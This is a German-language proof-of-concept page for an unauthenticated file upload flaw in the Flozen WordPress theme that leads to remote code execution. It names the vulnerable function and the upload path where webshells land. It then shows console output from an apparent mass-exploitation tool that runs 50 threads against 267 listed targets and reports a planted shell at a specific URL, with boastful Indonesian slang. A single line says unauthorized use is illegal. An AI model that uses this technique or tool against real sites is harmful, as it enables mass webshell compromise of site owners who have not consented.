
POC
Flozen < 1.5.1 – Nicht authentifizierter Upload beliebiger Dateien
Flozen Theme < 1.5.1 – Nicht authentifizierter Upload beliebiger Dateien
Beschreibung
Das Flozen-Theme für WordPress (Versionen bis einschließlich 1.5.1) ist anfällig für nicht authentifizierten Upload beliebiger Dateien, da in der Funktion flozen_add_new_custom_font() Authentifizierungsprüfungen fehlen und die Dateitypvalidierung unzureichend ist. Dadurch können nicht authentifizierte Angreifer beliebige ZIP-Dateien mit schädlichem PHP-Code (z. B. Webshell) hochladen, die automatisch nach wp-content/uploads/nasa-custom-fonts/ extrahiert werden, was zu vollständiger Remote-Codeausführung (RCE) führt.
~ CVSS-Score: 9.8 (Kritisch)
~ Betroffene Versionen: < 1.5.1
- [?] Enter filename with targets: list.txt
- [?] Enter threads (5-50): 50
- [*] Loading targets...
- [+] Loaded 267 targets
- [*] Starting 50 threads...
- [!] Gak Ada Bro Themes nya!: http://target.com
- [+] Gas Exploit Cuk! http://example.com/ | Version: 1.2.8 🚩💉
- [+] Shell Ada Bro! http://example.com/wp-content/uploads/nasa-custom-fonts/shadow/index.php
Die unbefugte Nutzung von Systemen, die dir nicht gehören oder für die du keine Testberechtigung hast, ist illegal.